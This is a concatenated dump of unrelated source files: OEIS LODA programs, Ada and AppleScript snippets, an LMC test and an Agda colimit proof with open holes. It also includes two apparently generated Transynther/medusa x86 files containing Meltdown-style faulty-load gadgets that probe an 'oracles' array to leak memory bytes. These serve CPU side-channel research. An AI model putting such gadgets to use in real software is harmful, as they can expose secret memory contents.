<filename>programs/oeis/051/A051960.asm ; A051960: a(n) = C(n)*(3n+2) where C(n) = Catalan numbers = A000108. ; 2,5,16,55,196,714,2640,9867,37180,140998,537472,2057510,7904456,30458900,117675360,455657715,1767883500,6871173870,26747767200,104268528210,406975466040,1590307356300,6220814327520,24357232569150,95452906901976,374369872911804,1469388245772160,5771284726028332 mov $5,$0 mov $7,2 lpb $7 clr $0,5 mov $0,$5 sub $7,1 add $0,$7 sub $0,1 mov $4,$0 div $4,2 mul $4,2 sub $4,$4 sub $0,$4 max $0,0 mul $4,2 cal $0,274104 ; a(n) = Sum_{k=0..n} (3*k+2)*Catalan(k). mov $2,$0 add $3,1 mov $1,$3 mov $1,$0 add $4,2 mov $8,$7 cmp $8,1 mul $8,$0 add $6,$8 lpe min $5,1 mul $5,$1 mov $1,$6 sub $1,$5

Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xa0_notsx.log_4508_711.asm

ljhsiun2/medusa

9

6143

.global s_prepare_buffers s_prepare_buffers: push %r12 push %r9 push %rcx push %rdi push %rsi lea addresses_A_ht+0x1e3ab, %rsi lea addresses_WC_ht+0x12073, %rdi nop nop nop dec %r9 mov $81, %rcx rep movsb nop add $21414, %r12 pop %rsi pop %rdi pop %rcx pop %r9 pop %r12 ret .global s_faulty_load s_faulty_load: push %r11 push %r14 push %r9 push %rbp push %rbx push %rcx push %rsi // Load mov $0x198e17000000023b, %rbx nop nop nop nop xor %rbp, %rbp movb (%rbx), %r11b nop nop nop nop cmp %rbx, %rbx // Load lea addresses_A+0x9ac3, %r9 nop nop xor $4742, %rcx movb (%r9), %r11b nop nop nop nop inc %r14 // Faulty Load mov $0x198e17000000023b, %rbp clflush (%rbp) nop nop cmp $26005, %rcx movups (%rbp), %xmm5 vpextrq $0, %xmm5, %r11 lea oracles, %r14 and $0xff, %r11 shlq $12, %r11 mov (%r14,%r11,1), %r11 pop %rsi pop %rcx pop %rbx pop %rbp pop %r9 pop %r14 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 1, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} {'src': {'type': 'addresses_A', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 2}, 'OP': 'LOAD'} [Faulty Load] {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 16, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_A_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 3, 'same': False}} {'00': 4508} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

programs/oeis/267/A267610.asm

neoneye/loda

22

23530

<gh_stars>10-100 ; A267610: Total number of OFF (white) cells after n iterations of the "Rule 182" elementary cellular automaton starting with a single ON (black) cell. ; 0,0,2,2,4,6,12,12,14,16,22,24,30,36,50,50,52,54,60,62,68,74,88,90,96,102,116,122,136,150,180,180,182,184,190,192,198,204,218,220,226,232,246,252,266,280,310,312,318,324,338,344,358,372,402,408,422,436,466,480,510,540,602,602,604,606,612,614,620,626,640,642,648,654,668,674,688,702,732,734,740,746,760,766,780,794,824,830,844,858,888,902,932,962,1024,1026,1032,1038,1052,1058 lpb $0 mov $2,$0 sub $0,1 seq $2,71055 ; Number of 0's in n-th row of triangle in A071038. add $1,$2 lpe mov $0,$1

Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_578_1641.asm

ljhsiun2/medusa

9

179401

.global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %r8 push %rbx push %rcx push %rdi push %rdx push %rsi lea addresses_WC_ht+0x1365b, %rdi nop sub $38688, %rdx mov (%rdi), %ebx nop nop and %r8, %r8 lea addresses_A_ht+0x1ab5b, %rsi lea addresses_D_ht+0x1e547, %rdi nop add $55608, %r12 mov $70, %rcx rep movsq nop cmp %rdi, %rdi lea addresses_normal_ht+0x661b, %rsi nop nop nop nop nop sub $19976, %rbx mov $0x6162636465666768, %r12 movq %r12, %xmm5 and $0xffffffffffffffc0, %rsi movntdq %xmm5, (%rsi) nop nop add $22750, %rsi lea addresses_normal_ht+0x174db, %rsi lea addresses_D_ht+0x89f7, %rdi nop nop and %r14, %r14 mov $56, %rcx rep movsq nop nop nop nop add %rdx, %rdx lea addresses_WC_ht+0x1b1eb, %rdx nop nop nop inc %rsi mov $0x6162636465666768, %rbx movq %rbx, (%rdx) and %rcx, %rcx lea addresses_A_ht+0x1755b, %rsi lea addresses_A_ht+0xb3db, %rdi nop nop cmp $29860, %r12 mov $84, %rcx rep movsw nop nop nop nop nop inc %rsi pop %rsi pop %rdx pop %rdi pop %rcx pop %rbx pop %r8 pop %r14 pop %r12 ret .global s_faulty_load s_faulty_load: push %r11 push %r14 push %r8 push %r9 push %rcx push %rdi push %rsi // Store lea addresses_PSE+0x16dd5, %r8 nop nop nop dec %r14 mov $0x5152535455565758, %r9 movq %r9, (%r8) dec %rcx // Store lea addresses_WC+0x129cb, %rdi nop nop nop nop cmp $52673, %r11 movl $0x51525354, (%rdi) xor %rdi, %rdi // Store lea addresses_PSE+0x1db5b, %rdi inc %r8 movl $0x51525354, (%rdi) nop nop nop nop cmp $23907, %r14 // Store lea addresses_US+0x1f85b, %rsi clflush (%rsi) nop sub $24750, %r14 movl $0x51525354, (%rsi) cmp $1120, %r11 // Faulty Load lea addresses_RW+0x655b, %rdi and %rsi, %rsi vmovups (%rdi), %ymm4 vextracti128 $1, %ymm4, %xmm4 vpextrq $1, %xmm4, %rcx lea oracles, %r11 and $0xff, %rcx shlq $12, %rcx mov (%r11,%rcx,1), %rcx pop %rsi pop %rdi pop %rcx pop %r9 pop %r8 pop %r14 pop %r11 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_RW', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 9, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_US', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_RW', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} <gen_prepare_buffer> {'OP': 'LOAD', 'src': {'type': 'addresses_WC_ht', 'size': 4, 'AVXalign': True, 'NT': False, 'congruent': 8, 'same': False}} {'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 2, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'size': 16, 'AVXalign': False, 'NT': True, 'congruent': 4, 'same': False}} {'OP': 'REPM', 'src': {'type': 'addresses_normal_ht', 'congruent': 6, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 2, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': True}} {'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 11, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 7, 'same': True}} {'32': 578} 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 */

tools/scitools/conf/understand/ada/ada12/a-locale.ads

brucegua/moocos

1

23036

<gh_stars>1-10 ------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME COMPONENTS -- -- -- -- A D A . L O C A L E S -- -- -- -- S p e c -- -- -- -- Copyright (C) 2010, Free Software Foundation, Inc. -- -- -- -- This specification is derived from the Ada Reference Manual for use with -- -- GNAT. In accordance with the copyright of that document, you can freely -- -- copy and modify this specification, provided that if you redistribute a -- -- modified version, any changes that you have made are clearly indicated. -- -- -- ------------------------------------------------------------------------------ package Ada.Locales is pragma Preelaborate (Locales); pragma Remote_Types (Locales); type Language_Code is array (1 .. 3) of Character range 'a' .. 'z'; type Country_Code is array (1 .. 2) of Character range 'A' .. 'Z'; Language_Unknown : constant Language_Code := "und"; Country_Unknown : constant Country_Code := "ZZ"; function Language return Language_Code; function Country return Country_Code; end Ada.Locales;

list/ListAsserter.applescript

GitSyncApp/applescripts

6

3297

(* * Note: to log the return value you must create an if statment that asserts the boolean value returned, short hand if statment should work *) on equals_to(a, b) return a = b end equals_to (* * {1,2,3,4} contains 3--true * Note: to log the return value you must create an if statment that asserts the boolean value returned, short hand if statment should work *) on contains_List(a, b) a contains b end contains_List --Add these to this class: -- add {1, 2, 3, 4} starts with {1} -- add {1, 2, 3, 4} ends with {3, 4} -- add {1, 2} is in {1, 2, 3}--true

tests/load-store.asm

tcort/lmc

2

161510

<reponame>tcort/lmc<filename>tests/load-store.asm INP ; get the first input STA FIRST ; store it in FIRST INP ; get the second input STA SECOND ; store it in SECOND LDA FIRST ; load FIRST OUT ; output value LDA SECOND ; load SECOND OUT ; output value HLT ; end of program FIRST DAT ; storage SECOND DAT ; storage

programs/oeis/071/A071178.asm

neoneye/loda

22

98705

<gh_stars>10-100 ; A071178: Exponent of the largest prime factor of n. ; 0,1,1,2,1,1,1,3,2,1,1,1,1,1,1,4,1,2,1,1,1,1,1,1,2,1,3,1,1,1,1,5,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,3,1,1,1,1,1,1,1,1,1,6,1,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,2 add $0,1 mov $2,2 mov $3,$0 mov $4,$0 lpb $3 mov $1,0 mov $5,$4 lpb $5 add $1,1 mov $6,$0 div $0,$2 trn $3,5 mod $6,$2 cmp $6,0 sub $5,$6 lpe add $2,1 mov $6,$0 cmp $6,1 cmp $6,0 sub $3,$6 lpe mov $0,$1

tests/ships-test_data-tests-crew_container.ads

thindil/steamsky

80

25597

<filename>tests/ships-test_data-tests-crew_container.ads<gh_stars>10-100 package Ships.Test_Data.Tests.Crew_Container is end Ships.Test_Data.Tests.Crew_Container;

Pruebas/HolaMundo.adb

Arles96/PCompiladores

0

1045

procedure HolaMundo is begin put("<NAME>"); end HolaMundo;

test/Fail/Issue875.agda

shlevy/agda

1,989

13050

postulate A : Set P : ..(_ : A) → Set f : {x : A} → P x g : ..(x : A) → P x g x = f

UpTo-Properties/UpToColim.agda

hbasold/Sandbox

0

1240

<reponame>hbasold/Sandbox -- | In this module, we proof that the 2-category of endofunctors -- inherits locally all colimits from underlying category. -- More precisely, for a functor F : C → C, we compute in Endo(F, F) -- colimits point-wise from those in C. module UpToColim where open import Level open import Relation.Binary using (Rel; IsEquivalence) open import Data.Product open import Categories.Support.Equivalence open import Categories.Category open import Categories.2-Category open import Categories.Functor open import Categories.NaturalTransformation renaming (id to natId; _≡_ to _≡N_; setoid to natSetoid) hiding (_∘ˡ_; _∘ʳ_) open import Categories.Support.EqReasoning open import Categories.Colimit open import Categories.Cocones open import Categories.Cocone open import Categories.Object.Initial open import Categories.Functor.Constant open import NaturalTransFacts open import UpTo -- _⇒_ = NaturalTransformation EndoDiagram : (C : Cat₀) → (F : EndoFunctor C) → (I : Cat₀) → Set EndoDiagram C F I = Functor I (EndoMor (C , F) (C , F)) PW-Diagram : {C : Cat₀} → {F : EndoFunctor C} → {I : Cat₀} → EndoDiagram C F I → (X : Category.Obj C) → Functor I C PW-Diagram {C} {F} {I} D X = record { F₀ = λ i → Functor.F₀ (Endo⇒.T (D.F₀ i)) X ; F₁ = λ h → NaturalTransformation.η (UpTo⇒.γ (D.F₁ h)) X ; identity = ≡U-proof D.identity ; homomorphism = ≡U-proof D.homomorphism ; F-resp-≡ = λ x → ≡U-proof (D.F-resp-≡ x) } where module C = Category C module D = Functor D module I = Category I open _≡U_ EndoMor-inherit-colim : {C : Cat₀} → (F : EndoFunctor C) → {I : Cat₀} → (D : EndoDiagram C F I) → ((X : Category.Obj C) → Colimit (PW-Diagram D X)) → Colimit D EndoMor-inherit-colim {C} F {I} D c = record { initial = record { ⊥ = colim-D ; ! = out ; !-unique = out-unique } } where -- Notations module C = Category C module I = Category I module CC-D = Category (Cocones D) -- Components of F F₀ = Functor.F₀ F F₁ = Functor.F₁ F -- Components of the diagram D D₀ = Functor.F₀ D D₁ = Functor.F₁ D -- Tᵢ = π₁(D(i)) T : (i : I.Obj) → Functor C C T i = Endo⇒.T (D₀ i) -- Components of T T₀ = λ i → Functor.F₀ (T i) T₁ = λ i {A} {B} → Functor.F₁ (T i) {A} {B} -- ρ‌ᵢA = π₂(D(i)) ρ : (i : I.Obj) → (T i ∘ F) ⇒ (F ∘ T i) ρ i = Endo⇒.ρ (D₀ i) ρη : (i : I.Obj) → (A : C.Obj) → C [ T₀ i (F₀ A) , F₀ (T₀ i A) ] ρη i A = NaturalTransformation.η (ρ i) A -- The natural transformation (w/o proof) D(f) : D(i) ⇒ D(i) D₁η : ∀ {i j} → (f : I [ i , j ]) → (A : C.Obj) → C [ T₀ i A , T₀ j A ] D₁η f A = NaturalTransformation.η (UpTo⇒.γ (D₁ f)) A ----- Construction of the colimit ----- -- It is given by the cocone (colim-T, ρ). -- Action of colim-T on objects colim-T₀ : C.Obj → C.Obj colim-T₀ A = CL.∃F where module CL = Colimit (c A) -- Injection into colim DX κ : (i : I.Obj) → (X : C.Obj) → C [ T₀ i X , Colimit.∃F (c X) ] κ i X = Colimit.Ic.ψ (c X) i -- Given a morphism u : A → B in C, we construct a cocone DA ⇒ colim DB, -- which will give us then T(u) by the universal property of colim DA. -- The components of the cocone are given by κBᵢ ∘ Tᵢ(u) : T₁(A) → colim DB, -- where we use that Tᵢ(A) = DA(i). cocone-T₁ : {A B : C.Obj} → C [ A , B ] → Category.Obj (Cocones (PW-Diagram D A)) cocone-T₁ {A} {B} u = record { N = colim-T₀ B ; ψ = λ i → C [ κB i ∘ T₁ i u ] ; commute = comm } where module CA = Colimit (c A) module PW-Cocones-A = Category (Cocones (PW-Diagram D A)) module CB = Colimit (c B) DA = PW-Diagram D A module DA = Functor DA DB = PW-Diagram D B module DB = Functor DB -- Injection into colim DB κB : (i : I.Obj) → C [ T₀ i B , CB.∃F ] κB i = NaturalTransformation.η CB.ι i .comm : {i j : I.Obj} (f : I [ i , j ]) → C [ κB i ∘ T₁ i u ] C.≡ C [ κB j ∘ T₁ j u ] C.∘ DA.F₁ f comm {i} {j} f = begin C [ κB i ∘ T₁ i u ] ↓⟨ C.∘-resp-≡ˡ (Colimit.Ic.commute (c B) f) ⟩ (κB j C.∘ DB.F₁ f) C.∘ T₁ i u ↓⟨ C.assoc ⟩ κB j C.∘ (DB.F₁ f C.∘ T₁ i u) ↓⟨ C.∘-resp-≡ʳ (NaturalTransformation.commute (UpTo⇒.γ (D₁ f)) u) ⟩ κB j C.∘ (T₁ j u C.∘ DA.F₁ f) ↑⟨ C.assoc ⟩ C [ κB j ∘ T₁ j u ] C.∘ DA.F₁ f ∎ where open SetoidReasoning (C.hom-setoid {DA.F₀ i} {colim-T₀ B}) -- Action of colim-T on morphisms colim-T₁ : {A B : C.Obj} → C [ A , B ] → C [ colim-T₀ A , colim-T₀ B ] colim-T₁ {A} {B} u = CoconeMorphism.f (CA.I.! {cocone-T₁ u}) where module CA = Colimit (c A) -- Proof that T(id_A) = id_{T(A)} .colim-T-id : ∀ {A : C.Obj} → C [ colim-T₁ (C.id {A}) ≡ C.id {colim-T₀ A} ] colim-T-id {A} = CA.I.⊥-id (record { f = colim-T₁ (C.id {A}) ; commute = λ {i} → let open SetoidReasoning (C.hom-setoid {DA.F₀ i} {colim-T₀ A}) in begin C [ colim-T₁ (C.id {A}) ∘ κ i A ] -- colimit property of T(id) = [κ i A ∘ id]_{i ∈ I} ↓⟨ CoconeMorphism.commute (CA.I.! {cocone-T₁ (C.id {A})}) ⟩ C [ κ i A ∘ T₁ i (C.id {A}) ] -- Functoriality of Tᵢ ↓⟨ C.∘-resp-≡ʳ (Functor.identity (T i)) ⟩ C [ κ i A ∘ C.id {T₀ i A} ] ↓⟨ C.identityʳ ⟩ κ i A ∎ }) where module CA = Colimit (c A) module DA = Functor (PW-Diagram D A) -- Proof that T(g ∘ f) = Tg ∘ Tf .colim-T-hom : {X Y Z : C.Obj} {f : C [ X , Y ]} {g : C [ Y , Z ]} → colim-T₁ (C [ g ∘ f ]) C.≡ C [ colim-T₁ g ∘ colim-T₁ f ] colim-T-hom {X} {Y} {Z} {f} {g} = CX.I.!-unique CX⇒TgTf where module CX = Colimit (c X) module CY = Colimit (c Y) module DX = Functor (PW-Diagram D X) module CC-DX = Category (Cocones (PW-Diagram D X)) -- Show that Tg ∘ Tf is a cocone for T(g ∘ f), which implies that -- Tg ∘ Tf = T(g ∘ f). -- To achieve this, we need to show that for each i ∈ I, we have -- Tg ∘ Tf ∘ κ i X = κ i Z ∘ Tᵢ (g ∘ f). CX⇒TgTf : Colimit.I.⊥ (c X) CC-DX.⇒ cocone-T₁ (C [ g ∘ f ]) CX⇒TgTf = record { f = C [ colim-T₁ g ∘ colim-T₁ f ] ; commute = λ {i : I.Obj} → let open SetoidReasoning (C.hom-setoid {DX.F₀ i} {colim-T₀ Z}) in begin C [ colim-T₁ g ∘ colim-T₁ f ] C.∘ κ i X ↓⟨ C.assoc ⟩ colim-T₁ g C.∘ (colim-T₁ f C.∘ κ i X) ↓⟨ C.∘-resp-≡ʳ (CoconeMorphism.commute (CX.I.! {cocone-T₁ f})) ⟩ colim-T₁ g C.∘ (κ i Y C.∘ T₁ i f) ↑⟨ C.assoc ⟩ (colim-T₁ g C.∘ κ i Y) C.∘ T₁ i f ↓⟨ C.∘-resp-≡ˡ (CoconeMorphism.commute (CY.I.! {cocone-T₁ g})) ⟩ (κ i Z C.∘ T₁ i g) C.∘ T₁ i f ↓⟨ C.assoc ⟩ κ i Z C.∘ (T₁ i g C.∘ T₁ i f) ↑⟨ C.∘-resp-≡ʳ (Functor.homomorphism (T i)) ⟩ C [ κ i Z ∘ T₁ i (g C.∘ f) ] ∎ } -- Proof that T respects the equality of C. .colim-T-resp-≡ : {A B : C.Obj} {f : C [ A , B ]} {g : C [ A , B ]} → C [ f ≡ g ] → C [ colim-T₁ f ≡ colim-T₁ g ] colim-T-resp-≡ {A} {B} {f} {g} f≡g = CA.I.!-unique CA⇒Tg where module CA = Colimit (c A) module DA = Functor (PW-Diagram D A) module CC-DA = Category (Cocones (PW-Diagram D A)) -- That T respects ≡ is inherited point-wise from the fact that -- each Tᵢ respects ≡. CA⇒Tg : Colimit.I.⊥ (c A) CC-DA.⇒ cocone-T₁ f CA⇒Tg = record { f = colim-T₁ g ; commute = λ {i} → let open SetoidReasoning (C.hom-setoid {DA.F₀ i} {colim-T₀ B}) in begin C [ colim-T₁ g ∘ κ i A ] ↓⟨ CoconeMorphism.commute (CA.I.! {cocone-T₁ g}) ⟩ C [ κ i B ∘ T₁ i g ] ↑⟨ C.∘-resp-≡ʳ (Functor.F-resp-≡ (T i) f≡g) ⟩ C [ κ i B ∘ T₁ i f ] ∎ } -- The colimiting up-to technique colim-T : Functor C C colim-T = record { F₀ = colim-T₀ ; F₁ = colim-T₁ ; identity = colim-T-id ; homomorphism = colim-T-hom ; F-resp-≡ = colim-T-resp-≡ } -- Cocone to construct ρ = [F₁ (κᵢ A) ∘ ρᵢ A]_{i ‌∈ I} cocone-ρ : {A : C.Obj} → Category.Obj (Cocones (PW-Diagram D (F₀ A))) cocone-ρ {A} = record { N = F₀ (colim-T₀ A) ; ψ = λ i → C [ F₁ (κ i A) ∘ ρη i A ] ; commute = λ {i} {j} f → let open SetoidReasoning (C.hom-setoid {T₀ i (F₀ A)} {F₀ (colim-T₀ A)}) in begin C [ F₁ (κ i A) ∘ ρη i A ] ↓⟨ C.∘-resp-≡ˡ (Functor.F-resp-≡ F (CA.Ic.commute f)) ⟩ C [ F₁ ((κ j A) C.∘ (DA.F₁ f)) ∘ ρη i A ] ↓⟨ C.∘-resp-≡ˡ (Functor.homomorphism F) ⟩ C [ C [ F₁ (κ j A) ∘ F₁ (DA.F₁ f) ] ∘ ρη i A ] ↓⟨ C.assoc ⟩ C [ F₁ (κ j A) ∘ C [ F₁ (DA.F₁ f) ∘ ρη i A ] ] ↓⟨ C.∘-resp-≡ʳ (lemma f) ⟩ C [ F₁ (κ j A) ∘ C [ ρη j A ∘ DFA.F₁ f ] ] ↑⟨ C.assoc ⟩ C [ F₁ (κ j A) ∘ ρη j A ] C.∘ DFA.F₁ f ∎ } where module CA = Colimit (c A) module DA = Functor (PW-Diagram D A) module DFA = Functor (PW-Diagram D (F₀ A)) -- Lemma to turn the commuting square for ρ into the equation we need .lemma : {i j : I.Obj} → (f : I [ i , j ]) → C [ F₁ (DA.F₁ f) ∘ ρη i A ] C.≡ C [ ρη j A ∘ DFA.F₁ f ] lemma {i} {j} f = begin C [ F₁ (DA.F₁ f) ∘ ρη i A ] ↑⟨ C.∘-resp-≡ˡ C.identityʳ ⟩ C [ C [ F₁ (DA.F₁ f) ∘ C.id {F₀ (DA.F₀ i)} ] ∘ ρη i A ] ↑⟨ UpTo⇒.square (D₁ f) {A} ⟩ C [ ρη j A ∘ C [ T₁ j (C.id {F₀ A}) ∘ (DFA.F₁ f) ] ] ↓⟨ C.∘-resp-≡ʳ (C.∘-resp-≡ˡ (Functor.identity (T j))) ⟩ C [ ρη j A ∘ C [ C.id {T₀ j (F₀ A)} ∘ (DFA.F₁ f) ] ] ↓⟨ C.∘-resp-≡ʳ C.identityˡ ⟩ C [ ρη j A ∘ DFA.F₁ f ] ∎ where open SetoidReasoning (C.hom-setoid {T₀ i (F₀ A)} {F₀ (T₀ j A)}) colim-ρ-η : (A : C.Obj) → C [ colim-T₀ (F₀ A) , F₀ (colim-T₀ A) ] colim-ρ-η A = CoconeMorphism.f (CFA.I.! {cocone-ρ}) where module CFA = Colimit (c (F₀ A)) -- Natural transformation to make colim-T indeed an up-to technique colim-ρ : (colim-T ∘ F) ⇒ (F ∘ colim-T) colim-ρ = record { η = colim-ρ-η ; commute = λ {A} {B} f → let open SetoidReasoning (C.hom-setoid {colim-T₀ (F₀ A)} {F₀ (colim-T₀ B)}) in begin C [ colim-ρ-η B ∘ colim-T₁ (F₁ f) ] ↓⟨ {!!} ⟩ C [ F₁ (colim-T₁ f) ∘ colim-ρ-η A ] ∎ } where colim-Endo : Endo⇒ C F C F colim-Endo = record { T = colim-T ; ρ = colim-ρ } colim-ψ : (i : I.Obj) → UpTo⇒ (D₀ i) colim-Endo colim-ψ i = record { γ = record { η = λ X → κ i X ; commute = {!!} } ; square = {!!} } colim-D : CC-D.Obj colim-D = record { N = colim-Endo ; ψ = colim-ψ ; commute = {!!} } out : ∀ {A : CC-D.Obj} → colim-D CC-D.⇒ A out = {!!} out-unique : {A : CC-D.Obj} (f : colim-D CC-D.⇒ A) → out CC-D.≡ f out-unique = {!!}

Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_1639.asm

ljhsiun2/medusa

9

23017

